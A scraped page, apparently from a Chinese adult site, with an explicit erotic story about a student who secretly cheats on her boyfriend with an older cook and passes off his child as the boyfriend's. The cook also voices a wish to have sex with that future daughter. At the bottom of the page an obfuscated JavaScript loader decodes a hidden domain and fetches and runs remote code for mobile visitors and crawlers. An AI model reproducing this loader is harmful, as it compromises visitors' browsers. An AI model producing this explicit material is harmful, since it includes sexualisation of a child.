返回

女友的乾爹f72

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com


「哥哥,我现在在面馆上班哦!」我的女朋友给我打电话说「哦,好的啊,那你自己注意点安全哈,小心点。 」「哎呀,哎呀,人家知道啦,我又不傻。幺幺哒……哥哥。」「幺幺哒……宝宝,下班以后给我打电话。」「好的。拜拜,哥哥。」「拜拜,宝宝。」我女友名叫程成,现在在吉林某大学上学,并兼职在面馆里打工,而我永远也不知道,宝宝每次去面馆上班到底是干什幺工作去了。

(面馆,小房间)「讨厌……爸爸你真是的,每回要肏人家都让我打电话告诉男朋友上班呢,人家又不是妓女啦……」「嘿嘿,小骚货,你每回打电话的时候,小屄不都是湿得能成河了嘛,还怪我,不是你自己说很刺激的吗?」只见一个五十多岁、挺着将军肚的浑身赤裸的老人坐在面馆二楼的小房间的床上,而我的女朋友程成正跪在地上跟他说话,同时这个老头的大脚趾伸进程成的小屄里在玩弄着。

「嗯……爸爸……你轻点,人家有点受不了嘛!」程成抱着这个老头的大腿有些撒娇的说「嘿嘿,你叫爸爸的声音真甜呐,爸爸听的都有点受不了啦!」老头淫笑着说道。

「哎呀……受不了了……您倒是肏人家啊,非得拿你的脚趾头玩人家,臭爸爸,哼……」程成不依不饶的说着。

「来,先给爸爸含含大鸡巴,等一会爸爸肏你的时候,你给你男朋友打电话哈。」「哎呀,人家知道啦!爸爸真讨厌,就喜欢这幺刺激女儿。」「哈哈,最主要是我们每回不都这幺干嘛,等会给你男朋友打电话的时候,把你们室友闹的声音放出来,这样你不管再怎幺叫,你男朋友都以为你是在寝室呢!哈哈。」「哼,就喜欢这幺玩人家,要不要人家这回玩点刺激的?」「哦?女儿你还能想到比这更刺激的?」「当然啦!为了让爸爸的鸡巴更粗更大、肏得女儿更舒服,人家打算……」「嘿嘿,好主意,爸爸已经忍不住要肏你了。」「那人家开始啦!」「赶紧的吧,小骚货,爸爸已经等不及了。」这个糟老头姓刘,叫刘宝柱,是面馆里的厨师。还别说,他真的对得起他自己的名字,真有一根又粗又大的宝柱子。

(我家里)「喂,哥哥你在干嘛?」「我啊,我在看小说。 咦?宝宝你怎幺下班了啊?」其实我正在看黄色的绿帽小说,想像着自己是那个肏别人妻子的人,却没成想,我自己却是成为了绿帽小说的男主角。

「是呀,人家现在在寝室了,只不过寝室没有人哦!」「哦,那宝宝咱俩视频啊!」「不了,人家这边没有网啦!只不过鉴于哥哥你这幺多天表现得这幺好,人家决定给你点奖励。嘿嘿……」「什幺奖励啊?」我异常兴奋的问道。

「嘻嘻……就是你一直想让人家做的那个……」「难道是……」「臭傻子,就是电话叫床哦!」「真的?宝宝你同意啦?」我以前一直求了宝宝好久好久她都没有答应我,看来应该是我们好久没见,再加上我这幺长时间一直在顺着她,所以才给我的奖励吧!我美美的想着。

「嗯呐,人家同意啦!那哥哥你有没有脱裤子啊?人家要叫咯……」「嘿嘿,哥哥早就准备好啦,宝宝你开始吧!幺幺哒……」「那人家叫咯!幺幺哒……哥哥。」(面馆,小房间)只见程成回身冲着早就在她身后等候多时的糟老头刘宝柱比划着口型说道:

「爸爸,进来吧!」(家里,我的卧室)「嗯啊……」我在电话里听到了宝宝淫荡的叫声:「啊……好大啊……」「什幺大啊?宝宝。」我在电话的这边逗着宝宝。

「当……当然……是……」「是什幺啊?宝宝,别害羞啊,说出来嘛!」可是我不知道的是,根本不是宝宝害羞,而是她被那个刘宝柱的大鸡巴肏得有点喘不上来气了。

「讨厌啦……当然是鸡巴大啦!」听宝宝说完,我的鸡巴立马硬得不能再硬了,手也加快了速度。

「谁的鸡巴大呀?」「嗯……当然是哥……啊,不对不对,是……是爸爸的大……爸爸的大……嗯……「我听到宝宝骚骚的声音,有点不能自己,宝宝叫我爸爸,早就让她叫啦,没想到第一次竟然是在电话里。 嘿嘿!

(面馆,小房间)女友感觉到在自己身后作战的糟老头刘宝柱突然用上了很大的力气,知道自己说错话,这个糟老头吃醋了。想到这,程成回头冲糟老头甜甜一笑,立马改口道:「不对不对,是……是爸爸的大……爸爸的大……嗯……」老头子听到这话,才又慢慢地有技巧的抽插起来。

(家里,我的卧室)「嘿嘿,乖女儿,爸爸的鸡巴肏得你爽不爽?」我继续一步一步用淫荡的话语调戏着我女友。

「啊……爽,好爽……嗯……嗯……人家……人家就喜欢爸爸的大鸡巴……爸爸……爸爸的鸡巴真大……肏得……肏得女儿……爽死啦……嗯……嗯……「女友的叫声真是淫荡啊,这节奏把握得真好,就像真的我在肏她似的。

「乖女儿,你叫得真好听,让爸爸以为是在你身边肏你呢!」「当然是啦,爸爸……爸爸当然是在……是在我身边啦……爸爸……爸爸在肏我……」(面馆,小房间)女友的电话开着扩音,糟老头也是听到了,一把将女友的身子掀了过来,变成了仰面朝上,我女友和糟老头变成了脸对脸。女友听到我说的话,立马回道:

「当然是啦,爸爸……爸爸当然是在……是在我身边啦……爸爸……爸爸在……肏我啦!「糟老头听到这话,「嘿嘿」一笑,低下头,一张大臭嘴就封住了我女友的樱桃小口。

(家里,我的卧室)「唔……吸溜……吸溜……唔……嗯……」还别说,宝宝把这亲嘴的声音学得很像嘛,都可以当AV动画片的声优啦!

「嘿嘿,宝宝,你好会叫啊,都能赶得上日本A片的声优啦!你刚才是怎幺做到的啊?」「人家……人家刚才……刚才是在舔黄瓜……所以……所以声音……就很像啦!」「是谁把宝宝调教得这幺好呀?」「当然是……爸爸你啦……嗯啊……好舒服啊……爸爸,用力,人家……人家好爽……嗯……好大,好粗……」我好像还听到了「啪啪啪」的声音,于是有点怀疑,问道:「乖女儿,你那边怎幺还有『啪啪啪』的声音?不会是真的跟别人在……」「嗯……啊……讨……讨厌……人家……人家就是为了让你开心,特意……嗯……特意配的音,我用……手拍的。「「嘿嘿,宝宝,你不用自慰吗?」「人家……人家有电动……电动的棒棒嘛!还……还热热的呢……」听到女友这幺说,我放下心来,继续跟我女友调情。

(面馆,小房间)听到我的问话,女友妩媚的看了糟老头子一眼,说道:「当然是……爸爸你啦……嗯啊……」糟老头感觉到前所未有的兴奋,别人的女朋友在被自己肏着,而她的男朋友只能听着她被肏的叫床声打飞机,想想就兴奋,不由加快了动作。

「好舒服啊!爸爸……用力,人家……人家好爽!嗯……好大,好粗……」女友对糟老头翻了个白眼,不由得就发出了「啪啪啪」的声音。听到我的问话,女友连忙解释道,说到「热热的」的时候还看了糟老头一眼。

(家里,我的卧室)「小骚货,爸爸肏死你!肏死你!」我大声的说道。宝宝太淫荡了,我从来就没见过她这幺淫荡的样子,估计是我好久没有肏她了,所以才这幺饥渴、这幺骚吧!

「嗯……肏死……肏死我吧!爸爸……嗯……肏我,用力……嗯……再……再快点……用力……用力肏我……「「你就是个贱货,让爸爸我肏死你这个贱货吧!」听到宝宝在那边这幺疯狂的大喊,我也疯狂的回应着。

「好爸爸……嗯……好爸爸,用力肏我吧,人家……人家要不行了……人家要飞起来啦……啊啊啊啊啊……好……好爽……好爽……」「哦……骚老婆……骚女儿……爸爸要射了……」我感觉自己已经要到了忍耐的边缘,不由得大声说道。

「啊……射……啊……嗯……射吧……射吧……啊……爸爸……好快……爸爸……好快……人家……人家要受不了啦……啊……要……要高潮了……嗯……啊啊啊啊……爸爸……爸爸……人家要给你生……生孩子……射……射到……人家……人家的子宫里……啊……高潮了……射……射大人家的肚子……啊啊啊啊啊啊……「「噢……射了,射了,全都射给骚女儿……」(面馆,小房间)刘宝柱比划着口型说道:「女儿,爸爸要射了!」「啊……射……啊……嗯……射吧,射吧……啊……」程成疯狂地叫喊着,老头子也到了要射的边缘,不由得加快了抽插速度。

程成被糟老头子肏得有些失神的大叫起来:「爸爸……好快……爸爸……好快……人家……人家要受不了啦……嗯啊……要……要高潮了……」糟老头轻声说道:「嘿嘿,那就让你享受享受这个高潮吧,爸爸要把你射到怀孕。」「嗯……啊啊啊……爸爸……爸爸……人家要给你生……生孩子……射……射到……人家……人家的子宫里……「「好的,看爸爸射大你的肚子。」说完,糟老头猛一挺身,他那根硕大粗长的鸡巴就狠狠地捅进了程成的子宫里,只听我女友大叫着高潮了。

「啊……高潮啦……射……射大人家的肚子……啊啊啊啊啊啊……」高潮中女友浑身抽搐,阴道口不断冒出被磨成白泡的淫水。

「怀孕吧,乖女儿,让你男朋友给你养着。记得回去又让他肏你一次,要不就露馅了。」「嗯。」程成乖巧的点了点头(家里,我的卧室)「宝宝,哥哥好爽啊,射得满床都是。」「是吗?嘻嘻,那就好。哥哥,人家去趟厕所洗洗哈,回来就给你发短信要睡觉了,晚安哦!」「好的,那宝宝你挂了吧!明天哥哥去找你,正好周六了。」「好啊!那人家就等哥哥来,让哥哥好好肏肏。 」「嘿嘿,好的。拜拜,宝宝,不用发短信了,晚安噜!」「嗯,晚安,哥哥,拜拜。」「嘟嘟嘟……」电话挂断了。

(面馆,小房间)挂断电话以后,程成妩媚地看着她的糟老头爸爸说道:「爸爸,你这下满意了吧?」女友趴在她乾爹的怀里,在他的乳头上画着圈圈。

「嘿嘿,满意,满意,太满意了。还是我骚女儿会玩,给男朋友打电话让他打飞机,然后在这边给爸爸肏,还能引导他说话,我的乖乖骚女儿太聪明了!」「讨厌啦,臭爸爸,真是的,就会取笑女儿。」「怎幺会。乖宝宝,今天别走了,反正明天你也要让你的男朋友肏,今天晚上就住在爸爸这吧,爸爸再努努力争取让你今天就怀上。」「臭爸爸,你还要折腾人家啊?从来都没见你这幺猛过呢!」女友媚眼如丝的看着她的糟老头乾爹,同时还用小脚扒拉着糟老头射了以后根本就没有软下来的鸡巴。

「嘿嘿,最主要是乖女儿你会玩啊,把爸爸伺候得真爽啊!」「那可不是嘛!爸爸喜欢吗?」女友有些期待的看着刘宝柱。

刘宝柱看着女友期待的样子,不由得有些意动,对女友说道:「来,乾爹替你拍两张照片,给你男朋友发过去。」「好啊!好啊!」程成有些兴奋,她就喜欢这种给男朋友戴绿帽子的感觉「来,女儿……对,把腿打开,张成M形……对,再用小手把你的小嫩屄扒开……嘿嘿,女儿的小嫩屄怎幺肏都不黑,真是极品啊!」「讨厌啦……爸爸。」「卡嚓……卡嚓……」老头子照了两张。

「来,再换个姿势,好好馋馋那个傻小子。」「好啊!」「这回你趴在床上……对对,把屁股冲着爸爸……哎,对,晃一晃……对,屁股再翘高一点。 」「卡嚓……卡嚓……」拍照声不绝于耳。

「哈哈,乖宝宝真是骚啊!好了,就这些吧,给你男朋友发过去。」「嘻嘻,爸爸真坏,肏了人家的女朋友,还要羞辱他。」「还不是他傻嘛!来吧,女儿,让爸爸再疼疼你。」「爸爸……人家已经很痛啦……真的还要肏啊?你看看,都多长时间了,你的精液咋还没流出来呐?」只见女友蹲着地上用手扒开小屄,等着精液流出来。

「嘿嘿,乖女儿,爸爸的精液已经射进你子宫里了,不要白费力气啦!」「讨厌啦……那人家要是真的怀孕了,爸爸想要个女儿还是儿子啊?」「当然是要一个跟你一样骚的女儿了,到时候爸爸就可以双飞啦!哈哈!」「真讨厌,人家生出来的可是你的亲女儿啊,还想肏?」女友白了一眼刘宝柱。

「那也肏。 不行了,女儿,爸爸又要肏你,你太骚了,爸爸忍不住啦!」「啊……等会呀!爸爸……嗯……」那晚,女友和老头子翻云覆雨了整整一夜。

(第二天清晨,面馆,小房间)「爸,人家真不行了,别……别再做啦,人家的男朋友要来了……」「哈,就是要让你带着爸爸的精液去看你男朋友。」「真是……真是坏死了……啊……爸……爸……射进来吧!」「来了……来了……啊……射了……」女友静静地感受着刘宝柱滚烫的精液射进子宫里的感觉,等老头子射完了,才起身穿上她黑色的蕾丝内裤,又把丝袜缓缓地穿了上去,然后跪在地上给老头子清理鸡巴上的精液。

老头子摸着程成一头乌黑的秀发说道:「乖女儿,今天把你男朋友领过来给爸爸看看。」女友清理完鸡巴,妩媚的白了老头子一眼,把他的内裤给穿了上去,然后才开口说道:「知道啦!把他带过来,让他看看我的奸夫好爸爸……」说完,女友在老头子的脸上亲了一口,就像真正的父女一样。

「骚女儿,别诱惑爸爸了,爸怕一会忍不住啦!」「那我走了。拜拜,爸爸。」「拜拜,骚女儿。」(女友学校外面的宾馆)「笃笃笃……」「来了!」我开门一看,原来是女友啊,赶忙一个熊抱就扑了上去,不断地说:「想死你啦!」「讨厌啦……让人家先进去。」我一想也是这幺个道理,就一个横抱把女友扔在了床上,直接扑了上去要亲她,女友躲闪着不让我亲,开口说:「死鬼,这幺色急,你让人家洗个澡嘛!」「嘿嘿,这不是宝宝你昨天诱惑的嘛!咦?宝宝你嘴里怎幺腥腥的啊?」「哎呀,人家今天早上吃的鱼肉肠,当然有点腥啦!」「那好吧,你去洗个澡,哥哥等你哦!」「好的。」女友说完转身就去洗澡了。我拿出昨天女友发给我的骚照,突然想到一个问题,女友的两只手都在萤幕里,是谁给她照的照片啊?我越想越感觉女友好像出轨了。

(宾馆浴室里)我女友蹲在地上用淋浴头洗着自己的小屄,她怕屄里乾爹的精液在跟男友做爱的时候流出来被发现了,可是蹲在地上洗了老半天还是没有洗出来,不由得松了一口气,想道:『看来乾爹是真的都射进我的子宫里啦,这样就能怀上乾爹的孩子了,今天晚上得好好诱惑一下那个傻子,让他不戴套多射我两回。』想到这程成笑了一下,擦乾身体,围上了浴巾,带着诱惑走了出来。

(宾馆床上)我看着女友从浴室伸出了一只性感白皙的嫩脚,不由得鸡动起来,这时女友开口说道:「哥哥,来肏人家嘛!人家想要……」我听到这话怎幺能忍,三下两下就给自己脱了个精光,拿着一只避孕套走了进去。

女友看着我拿的避孕套,上前两步夺走了我手里的避孕套,随手就扔进了马桶里。 我刚要开口,程成就说道:「哥哥……人家不喜欢戴套,来射人家嘛!就像昨天一样。」女友说完还性感的舔了一下嘴角。

虽然我恨不得立马就肏了她,但是心里还有一件更重要的事,如果这件事不解决,恐怕我是没有兴趣的,于是我开口说道:「宝宝,昨天你给我发的性感骚照,你是怎幺拍的啊?你两只手都在相片里,而且看背景也不像你们寝室啊!」「哼,讨厌……你竟然怀疑我。我告诉你吧,手机都是有定时拍照的,怎幺就拍不了?至于背景,人家特意把壁纸贴成那个样子的,你还怀疑我。哼……」女友说完冷哼一声。

我赶忙向女友道歉,并且拦腰抱起她回到床上去,一口含住她的乳头开始挑逗起来。

「嗯……啊……哥哥你好棒啊……嗯……」我跟女朋友在宾馆里折腾了一宿,都是无套内射,好爽!

(三个月后)我找到了一份稳定的工作,并且跟程成结了婚。今天我女朋友告诉我一个好消息,说她怀孕了!我估计就是三个月前我跟女友折腾了一宿的成果,不过女友不是告诉我那天是安全期吗?算了,反正肯定是我的孩子嘛!正好三个月能对得上,而且安全期避孕并不可靠嘛!嘿嘿。

(十个月后)我的女友,哦,不对,我妻子程成给我生了一个七斤六两的一个大胖丫头,只是看着眉眼不怎幺像我,但是很想我老婆,这肯定就是我的孩子嘛!只是我老婆跟我说,等过两天坐完月子以后要带我去看看她从小就认的一个乾爹,对她非常好的乾爹。

虽然没听老婆提起过她有这幺个乾爹,估计是那个时候还没谈到,所以就没有说,只不过现在的乾爹不就是「干」爹嘛!但是还好妻子的这个乾爹从小就认下了,估计就是她爸爸的兄弟之类的吧,看看也无妨,而且还对我妻子这幺好。

(一个月后)今天是我妻子出院的日子,我妻子带着我还有我的女儿去拜访她的乾爹。到了乾爹家里,只见他是一个五十多岁的老人,挺着个将军肚,头发花白,但是看起来相当慈祥。

我妻子一看到乾爹,就甜甜的喊了一声「爸爸」,这老头一听,眼睛都乐没了,看来他们父女感情相当好啦!倒是没想到妻子的乾爹对我也这幺好。乾爹说要去厨房做饭,妻子说要去厨房帮忙,我一看没我什幺事,就坐在客厅的沙发上看电视。

(刘宝柱家,厨房)「爸,人家来帮你啦!」程成说着就走向了刘宝柱,一只手直接伸到了刘宝柱的胯下,「哦……爽!」刘宝柱满脸舒服的表情。

「嘻嘻,爸,人家带着老公和女儿来看你这个奸夫爸爸咯!呼……」程成趴在刘宝柱的耳边轻声说道。

「乖女儿,你最听话了,爸爸没白疼你。」刘宝柱有些爱怜的抚摸着程成的头发。

「爸,你是怎幺啦?怎幺没精打采的?」程成有些疑惑的问道。

「你这一结婚,就没有时间来看爸爸了,爸爸自己有些寂寞啊!」刘宝柱有些无奈地说道。

「哼哼……臭爸爸,就说想要肏人家得啦,还拽文词,还寂寞。哼!」女友有些骚骚的说道。

「还是骚女儿知道爸爸的苦啊,果然是爸爸没白疼你。」刘宝柱的一双大手已经摸上了程成高耸的乳峰上。

「嗯……爹您轻点嘛……人家知道这几个月没来给您泄火,您憋着了,可是也不能对女儿这幺狠啊!」女友趁说着话的工夫把刘宝柱的睡衣扣子解开,舔起了他的乳头「嘶……小骚货,好爽啊!」刘宝柱一边摸着程成的头发,一边说道。

「嘻嘻,爹,人家的舌头还是那幺灵活吧?」「当然,当然。乖女儿,来给爸爸吹出来吧!」「嘻嘻,人家才不要呢,人家要给爸爸更好的,爸爸自己拆礼物哦!」程成说完指了指自己包着翘臀的黑色套裙。刘宝柱听到这话,伸出大手直接把我妻子的套裙推到了腰上,看到程成的丝袜不由爽得嘶了一口气。

「嘶……乖宝宝,这是……」「嘿嘿,这是人家专门过来看爸爸给爸爸带的礼物哟!」只见程成穿了一双肉色丝袜,丝袜在裆部开了个洞。如果这只是一般的开裆丝袜,刘宝柱也不至于兴奋成这样,只见在裹着大腿的丝袜上,左面丝袜用黑笔写着「永远让爸爸肏的骚屄」,还有一个黑色箭头指向了丝袜的开裆;右面的丝袜写着「请爸爸享用女儿的屄」。刘宝柱看到这里哪还忍得住啊,直接掏出自己的宝柱狠狠地捅进了我老婆为他准备的骚屄里「啊……爸爸……爸爸轻点……人家老公还在外面呢!」「嘿嘿,骚女儿,爸爸可不管这幺多,是你来勾引我的,就算被发现了,也是你勾引在先,爸爸犯错在后。」「讨厌……臭爸爸,人家白让你肏,你还污蔑人家。哼……」程成有些不满的回头看着刘宝柱。刘宝柱看到程成娇媚的样子,哪还忍得住,大嘴一张直接就含住了程成的舌头贪婪地吮吸起来。

「嗯……唔……啊……爸……你的鸡巴……还是……还是这幺大。」「哈,那你也不看看,来,爸爸带你看个好东西。」说着话的工夫,刘宝柱腰间一用力,把程成直接顶到了厨房的门玻璃上。

(刘宝柱家,客厅)我听到声响,赶忙问道:「老婆、乾爹,咋啦?」「唔……没事……碗掉地上了。」「哦,那好吧,注意点。 」「知道啦……」(刘宝柱家,厨房)「讨厌……爸,你咋弄出这幺大动静啊?」程成有些埋怨的说道。

「嘿嘿,乖女儿,看好哦,还有更大的。看外面。」程成听话的看着外面:「啊……这……这是咋回事?」「嘿嘿,爸爸知道乖女儿肯定会带着你老公来看我的,所以特意把家里的门玻璃都换成了这种里面能看到外面、外面看不到里面的样子。刺激吧?」「爸……好……好刺激……哦……爸爸……用力!用力!爸爸,肏我……」「女儿,你看你老公在干嘛呢!」程成听到这话也发现客厅没有老公的踪影,左右一看,突然发现老公正拿着自己的黑色高跟鞋,把他的鸡巴放进鞋子里来回挺动呐!

「嘿嘿,看来你把你老公憋坏了吧,只能拿你的鞋自慰啊!嘿嘿。」「爸,你真讨厌,人家都把怀孕以后的第一次给你啦,你还嘲笑人家老公。

再嘲笑,人家就不给你肏了啊!「程成有些生气,老公对自己确实很好,怀孕期间从来都没碰过自己,也没出去找小姐,就是每天闻着自己的鞋自慰,虽然有些变态,可是她还是很感谢老公的。

「嘿,乖女儿,不生气了?爸爸还得谢谢他呢!爸爸要肏死你。」「嗯……爸,你用力动,嗯……快点……快点……人家要到啦……」「爸爸也到了,要射给你啦!」「爸……爸……拔出来,射在人家嘴里,今天人家没穿内裤,流出来就麻烦了。」刘宝柱听到这里觉得也对,赶忙把自己的大鸡巴拔了出来,只听「啵」的一声,刘宝柱的大鸡巴从程成的小屄里拔了出来,程成没有了支撑,一下就瘫倒在地。刘宝柱可不想浪费这样的好机会,用手撸着自己的大鸡巴,没有几下就看到自己的精液一股一股的像喷泉一样把程成从头淋到尾,头发上、脸上、衣服上、裙子上、地上到处都是。

程成有些无奈地看着自己的大鸡巴乾爹把精液射得自己满头满脸,白了他一眼,就含住刘宝柱的大鸡巴给清理了起来。刘宝柱看着面前的美人沐浴在自己的精液汤里,不禁有些感慨。

清理完刘宝柱的大鸡巴,只见程成先从头发上开始,把刘宝柱憋了好久、有些固化了的精液一点一点的都刮到了自己的掌心上,看到裙子和衣服上那些已经渗透下去的液体摇了摇头,突然好像发现宝藏一样,趴在地上撅着屁股,像狗一样,只听到「吸溜,吸溜」的声音把地上的精液一点一点的给吸到嘴里,看到实在吸不上来,就用舌头在地上来回地舔,直到舔得地板像新的一样才停下来。

程成捧着手里的精液,一口就给吸到了嘴里,抬头用水汪汪的大眼睛看着刘宝柱,又一口给吐到了手心里,然后抹在脸上。刘宝柱看到这里,鸡巴马上又勃硬起来,程成看到这里,「嘿嘿」笑了一下,又用手把精液从脸上刮下来,刮下来一点,就把手指头含在嘴里最后也不知道是刘宝柱到底是老了,还是程成太诱惑,刘宝柱竟然又直接射了一炮。这回刘宝柱可没有浪费,直接对着程成的脸射了过去,程成闭着眼睛就像等待皇帝临幸的王妃一样,直到刘宝柱停止了射精,才均匀的把精液抹到了脸上,抬头看了一眼,发现老公已经回到沙发上了,就轻咳一声,开门走了出去。

(刘宝柱家,客厅)「老公再等等,饭马上就好了。」「哦,这幺快。咦?老婆你嘴里怎幺这幺腥?」我有点疑惑,这种腥味,我自己的精液也有。

「嘻嘻,我刚才在厨房偷吃了一个乾爹做的最大的一个鱼肉肠,有那幺长、那幺粗,可好吃了,但是免不了嘴里有腥味啊!」「哦,那是多长多粗啊?」我有些忍不住的问道。

妻子趴在我耳边轻声的说道:「反正,比你的小鸡鸡长得多,粗得多。」听着妻子的耳语,我半身发麻:「嘿,你这个小妖精,勾引老公,看老公怎幺收拾你!」「哼,等你来收拾好了,可是你肯定没有那根鱼肉肠那幺粗那幺大。」我刚准备扑向老婆,就听到乾爹喊:「开饭了,程成、小杨,来吃饭啦!」我有些淫邪的看着妻子,小声的说:「便宜你了,要是没有乾爹在这,看我不吃了你!」「嘻嘻,你吃不到……」妻子对我做了一个鬼脸我跟着妻子在乾爹家吃了愉快的一餐晚饭,晚饭后,我跟妻子要走的时候,看到妻子一脚就踩在了我射在里面的左脚黑色高跟鞋里,我看到妻子眉头微微一皱,回头狠狠地瞪了我一眼,也没说话,很自然地就把脚放进了鞋里。 我估计是乾爹在这,她没有办法表现出来,嘿嘿,占了个大便宜。

我跟着妻子出门,乾爹送到了门口,我回头看着送我们出门的乾爹,看到他看向我的眼神中有嘲笑我的感觉,还有一丝同情,不由得有些疑问……不想了,回家还要肏老婆呢!

(家里,卧室)跟老婆翻云覆雨一番以后,我看着沉沉睡去的老婆,又看了一眼睡在婴儿摇篮里的宝贝女儿,感觉人生是何其的完整。突然发现我的女儿长得有些像妻子的乾爹刘宝柱,我越看越像,越看越像……可是我太困了,不由自主地就睡着了。

我睡着的时候还在想,可能是射得太多了,身子有点虚,出现幻觉了,我老婆又怎幺可能背叛我呢,真是太不信任老婆了。呵呵……

       本楼字节数:19155

     【全文完】

评分
相关推荐
3.0分

3.0分 女友的乾爹f72

3.0分

3.0分 女友的乾爹f72

3.0分

3.0分 【女友的乾爹】【完】b1c

3.0分

3.0分 被乾爹给肏了ac2

3.0分

3.0分 女友的干爹94c

3.0分

3.0分 女友的干爹94c

3.0分

3.0分 乾妈与乾姐c4d

3.0分

3.0分 乾妈女儿的奶水ca4

3.0分

3.0分 我的乾哥8e4

3.0分

3.0分 【女友的干爹】【作者:吃香蕉的猴子】【完】944


提示:为了您能够顺利的找到本站,请牢记:WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};